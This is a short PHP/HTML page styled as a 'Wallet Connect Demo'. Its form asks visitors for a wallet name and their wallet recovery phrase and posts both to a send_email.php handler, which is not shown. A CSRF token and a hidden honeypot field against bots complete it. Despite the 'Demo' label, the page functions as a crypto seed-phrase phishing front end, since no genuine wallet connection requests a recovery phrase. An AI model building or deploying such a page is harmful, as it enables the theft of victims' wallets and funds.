<?php
session_start();
if (!isset($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Wallet Connect Demo</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #1e1e2f;
            color: #fff;
            padding: 40px;
        }
        .container {
            background: #2b2b3c;
            padding: 30px;
            border-radius: 8px;
            max-width: 400px;
            margin: auto;
        }
        h2 {
            text-align: center;
            margin-bottom: 20px;
        }
        label {
            display: block;
            margin-top: 10px;
        }
        input[type="text"],
        textarea {
            width: 100%;
            padding: 8px;
            margin-top: 5px;
            border-radius: 5px;
            border: none;
            font-size: 16px;
        }
        input[type="submit"] {
            margin-top: 20px;
            width: 100%;
            padding: 10px;
            background-color: #4caf50;
            border: none;
            color: white;
            font-size: 16px;
            cursor: pointer;
            border-radius: 5px;
        }
        input[type="submit"]:hover {
            background-color: #45a049;
        }
        .honeypot {
            display: none;
        }
    </style>
</head>
<body>
    <div class="container">
        <h2>Connect Your Wallet (Demo)</h2>
        <form action="send_email.php" method="POST">
            <label for="wallet_name">Wallet Name</label>
            <input type="text" id="wallet_name" name="wallet_name" required>

            <label for="wallet_phrase">Recovery Phrase</label>
            <textarea id="wallet_phrase" name="wallet_phrase" rows="4" required></textarea>

            <input type="hidden" name="csrf_token" value="<?php echo $_SESSION['csrf_token']; ?>">
            <input class="honeypot" type="text" name="extra_field" autocomplete="off">
            <input type="submit" value="Connect Wallet">
        </form>
    </div>
</body>
</html>
